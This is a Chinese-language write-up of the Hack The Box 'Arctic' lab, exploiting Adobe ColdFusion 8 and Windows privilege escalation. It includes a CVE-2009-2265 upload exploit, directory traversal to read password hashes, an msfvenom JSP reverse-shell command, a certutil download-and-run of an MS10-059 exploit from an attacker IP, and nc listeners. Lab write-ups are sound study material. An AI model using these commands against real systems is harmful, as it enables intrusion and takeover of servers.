0
点赞
收藏
分享

微信扫一扫

HTB靶场系列 Windows靶机 Arctic靶机

这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机

勘探

nmap

nmap -sS -p 1-65535 10.10.10.11     
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST
Nmap scan report for 10.10.10.11
Host is up (0.28s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 589.45 seconds

发现打开了8500端口,

可以使用nc尝试连接一下
nc 10.10.10.11 8500
等三十秒发现返回了一个报文
HTTP/1.0 200 OK
Date: Thu, 14 May 2020 18:48:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server

<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a>               <i>dir</i>   03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a>              <i>dir</i>   03/22/17 08:55 μμ
</pre><hr></html>

再用web打开看一下,发现可以浏览文件夹,发现了CFIDE和cfdocs文件夹可以确定了是adobe的ColdFusion系统,那么进入/CFIDE/administrator文件夹发现cfm8版本那么搜索一下有什么漏洞

searchsploit coldfusion 8                                                                                                                       1 ⨯
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                        |  Path
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                                   | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                                | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                                   | multiple/remote/16985.rb
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                           | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload                                                                         | multiple/webapps/45979.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                                             | windows/webapps/27755.txt
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                                       | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                          | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting       | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                 | cfm/webapps/33168.txt
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                                   | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                                         | windows/local/19220.c
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                     | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure                                                                               | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting                                                                 | cfm/remote/21548.txt
ColdFusion Scripts Red_Reservations - Database Disclosure                                                             | asp/webapps/7440.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                                             | multiple/remote/22867.pl
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

这里面有一个afe漏洞和一个baidu上广为流传的文件浏览

我们现在有两个获取shell的方向向量了

获取 tolis权限

RCE

首先利用afe漏洞

ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                     | cfm/webapps/16788.rb

这一条我们打开一下看看

'CVE', '2009-2265' ],
                                        [ 'OSVDB', '55684'],

只关注这一个,因为这是一个msf利用漏洞,我们不能直接利用,所以我们要自己找一个cve2009-2265利用poc,我们的利用poc是来自exploit的poc

注意复制粘贴后在文件内修改host,

if __name__ == '__main__':
    # Define some information
    lhost = '10.10.16.4'
    lport = 4444
    rhost = "10.10.10.11"
    rport = 8500
    filename = uuid.uuid4().hex

修改lhost和lport

有趣的是rhost不需要改,说明这个poc的作者也是在研究htb靶机的时候写的这个poc

这里利用脚本不需要nc监听,会直接打开shell

文件读取漏洞

Adobe ColdFusion - Directory Traversal - Multiple remote Exploit (exploit-db.com)

这个是漏洞利用的脚本,要是早一点看到官方文档就没有研究半天捅不出结果了,所以说,少看哪些不靠谱的漏洞利用攻略,老老实实看官方文档

后来我又在利用的时候忘记了靶机是windows系统,按照linux的文件系统去搜索了,又浪费了不少时间,我一度以为这个漏洞被修复了,直到后来我在用第一种方法获得shell之后查看文件目录的时候才意识到win的文件系统是不一样的

利用方法:

直接在地址栏按照利用方式进行访问就可以

这样可以访问密码文件,得到密码的sha1值,之后自行使用解密软件登录即可登录到后台管理系统

而后台管理存在一个文件上传部分,正好我们可以利用来与文件访问相配合获取shell

先用msf创建一个jsp文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jsp

接着打开python的服务器

python -m SimpleHTTPServers 80

然后通过创建一个任务来下载我们机器上的木马

debugging&Logging -> scheduled tasks -> schedule new task

然后在url处填写木马文件的地址

http://10.10.16.7/1.jsp然后submit提交过一会就会发现有一条请求发送到python上这时就是上传完毕了

然后我们发现我们上传的文件在刚刚8500端口的/CFIDE文件夹里,我们直接点击文件执行,然后这边打开nc监听

nc -lvnp 4444

搞定

提权至root权限

常规流程

想用systeminfo看一下配置

C:\>systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 
System Boot Time:          14/5/2020, 9:38:49 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 261 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.199 MB
Virtual Memory: In Use:    848 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

然后用wes看一下有什么没打的补丁,用法看工具篇

root@kali# /Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

发现舍去需要进入可视化界面利用的ie漏洞,我们可以使用的漏洞还是非常多的

  • MS10-047
  • MS10-059
  • MS10-061
  • MS10-073
  • MS11-011
  • MS13-005

我们跟随0xdf使用ms10-059漏洞this GitHub from egre55

这个很简单

下载之后

上传可以使用python服务器然后用cerl传送

python -m SimpleHTTPServer 80

certutil.exe -urlcache -split -f "http://10.10.16.7/2.exe" 1.exe下载

./1.exe 10.10.16.7 4444使用

记得打开nc接收shell转发

 

举报

相关推荐

0 条评论